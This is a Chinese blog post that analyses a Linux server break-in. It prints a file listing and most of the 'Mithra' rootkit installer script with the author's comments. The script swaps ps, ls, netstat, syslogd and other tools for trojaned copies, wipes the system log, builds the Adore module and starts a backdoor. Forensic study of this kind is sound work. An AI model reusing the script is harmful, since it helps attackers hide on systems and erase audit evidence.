网络通信 频道

Linux系统的入侵分析

我的一次入侵分析
  
  
  本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
  不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到
  message
  那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务
  器上检查。唉,果然。。。
  
  [root@mail a]# la- la
  bash: la-: command not found
  [root@mail a]# ls -la
  total 704
  drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
  drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
  drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
  drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
  drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
  drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
  drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
  -rw------- 1 root root 241664 Jan 28 23:01 core
  就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP
  就懒得升级,结果。。。等下再gdm你好了。
  
  drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
  -rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
  真要命,直接放,搞不懂是高手失误还是只会用别人的程序。
  drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
  drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
  drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
  drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
  drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
  drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
  drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
  dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
  drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
  就是这个rootkit!看来很多人用这个呢
  drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
  drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
  看到这2个目录没有,已经给改动过了,不可信任。
  
  drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
  drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
  drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
  drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
  [root@mail a]# date
  星期二 02 5 18:28:17 CST 2002
  
  
  
  [root@mail rk]# cat install
  #!/bin/sh
  unset HISTFILE
  STARTDIR=`pwd`
  CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
  这个程序的作者真不是人,连别人的信用卡都偷!
  
  SMP=`uname -a | grep smp | wc -l`
  还真的没考虑过入侵需要考虑是否SMP呢
  clear
  echo "***** \dev\hda1`s aka Mithra`s rootkit *****"
  echo "* greetz 2 bogonel and Amorph|s *"
  echo "* This is the RedHat 7.0 build *"
  echo "********************************************"
  sleep 2
  clear
  echo "Please wait while Setup is preparing your directory ... "
  sleep 5
  clear
  echo "Heh, sounds like f***in'' Windoze, doesn''t it ? :) "
  sleep 2
  clear
  DIR="/usr/lib/locale/ro_RO/uboot"
  mkdir -p $DIR
  mkdir -p $DIR/etc
  
  cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。
  cd $DIR
  
  echo "Installing trojaned system files ..."
  
  echo "[*] Process tools ..."
  替换查看进程命令,FT
  echo " |---ps"
  chattr -aiu /bin/ps
  ./sz /bin/ps ps
  mv -f ps /bin/ps
  chattr +aiu /bin/ps
  echo " | \\"
  echo " | |-- done replacing ps "
  
  sleep 1
  
  echo " |---pstree"
  chattr -aiu /usr/bin/pstree
  ./sz /usr/bin/pstree pstree
  mv -f pstree /usr/bin/pstree
  chattr +aiu /usr/bin/pstree
  echo " | \\"
  echo " | |-- done replacing pstree "
  
  sleep 1
  
  echo " |---top"
  chattr -aiu /usr/bin/top
  ./sz /usr/bin/top top
  mv -f top /usr/bin/top
  chattr +aiu /usr/bin/top
  echo " | \\"
  echo " | |-- done replacing top "
  echo " |----|"
  sleep 5
  
  echo "[*] Network tools ..."
  替换网络命令,FT,毒
  echo " |---netstat"
  chattr -aiu /bin/netstat
  ./sz /bin/netstat netstat
  mv -f netstat /bin/netstat
  chattr +aiu /bin/netstat
  echo " | \\"
  echo " | |-- done replacing netstat "
  
  sleep 1
  
  echo " |---ifconfig"
  chattr -aiu /sbin/ifconfig
  ./sz /sbin/ifconfig ifconfig
  mv -f ifconfig /sbin/ifconfig
  chattr +aiu /sbin/ifconfig
  echo " | \\"
  echo " | |-- done replacing ifconfig "
  
  #echo " |---inetd"
  贱啊,什么都换了
  
  #chattr -aiu /usr/sbin/inetd
  #./sz /usr/sbin/inetd inetd
  #mv -f inetd /usr/sbin/inetd
  #chattr +aiu /usr/sbin/inetd
  #echo " | \\"
  #echo " | |-- done replacing inetd "
  
  sleep 1
  
  echo " |---tcpd"
  chattr -aiu /usr/sbin/tcpd
  ./sz /usr/sbin/tcpd tcpd
  mv -f tcpd /usr/sbin/tcpd
  chattr +aiu /usr/sbin/tcpd
  echo " | \\"
  echo " | |-- done replacing tcpd "
  echo " |----|"
  sleep 1
  
  echo "[*] Filesystem tools ..."
  换了查找命令
  echo " |---find"
  chattr -aiu /usr/bin/find
  ./sz /usr/bin/find find
  mv -f find /usr/bin/find
  chattr +aiu /usr/bin/find
  echo " | \\"
  echo " | |-- done replacing find "
  
  sleep 1
  
  echo " |---ls"
  chattr -aiu /bin/ls
  ./sz /bin/ls ls
  mv -f ls /bin/ls
  chattr +aiu /bin/ls
  echo " | \\"
  echo " | |-- done replacing ls "
  echo " |----|"
  
  echo " |---dir"
  chattr -aiu /usr/bin/dir
  ./sz /usr/bin/dir dir
  mv -f dir /usr/bin/dir
  chattr +aiu /usr/bin/dir
  echo " | \\"
  echo " | |-- done replacing dir "
  echo " |----|"
  
  sleep 1
  
  echo "[*] System tools ..."
  
  echo " |---syslogd"
  chattr -aiu /sbin/syslogd
  ./sz /sbin/syslogd syslogd
  mv -f syslogd /sbin/syslogd
  chattr +aiu /sbin/syslogd
  echo " | \\"
  echo " | |-- done replacing syslog "
  echo " |----|"
  
  删除所有log文件,不过这里写得不好。
  用不删除,清内容更好。
  rm -f /var/log/messages
  touch /var/log/messages
  /etc/rc.d/init.d/syslog restart
  sleep 1
  
  echo "[*] Placing configuration files in $DIR/etc/ ..."
  mv -f netstatrc $DIR/etc/netstatrc
  mv -f procrc $DIR/etc/procrc
  mv -f filerc $DIR/etc/filerc
  mv -f logrc $DIR/etc/logrc
  sleep 1
  
  开始编译外挂进程了,还好,不是LKM
  echo "[*] Trying to install ADORE ..."
  if [ -x /usr/bin/gcc ];
  then
  echo "GCC is present"
  if [ -d /usr/src/linux ];
  then
  if [ $SMP -eq 0 ];
  then
  echo "We have a machine without SMP support"
  cp -f Makefile.non-smp Makefile
  else
  echo "This machine supports SMP"
  cp -f Makefile.smp Makefile
  fi
  make
  mv -f ava /usr/bin/weather
  还改头换面呢,呵呵~~
  rm -f *.c *.h Makefile*
  echo "ADORE is now installed ..."
  else
  echo "Kernel sources are not installed. Cannot install ADORE !"
  fi
  else
  echo "GCC is not installed. Cannot install ADORE !"
  fi
  
  echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
  mv -f network /etc/rc.d/init.d/network
  sleep 5
  mv -f twist2open /usr/bin/
  echo "[*] Starting services ..."
  #echo " |---backdoor ..."
  #echo " |---sniffer ..."
  加了后门还开SNIFFER,哼哼
  #echo " |---bnc ..."
  /usr/bin/twist2open &
  echo " | \\"
  echo " | |-- done"
  echo " |----|"
  rm -f ./*pid* /*pi

文章转载地址:http://www.cnpaf.net/Class/hack/06101110491638300980.html

0
相关文章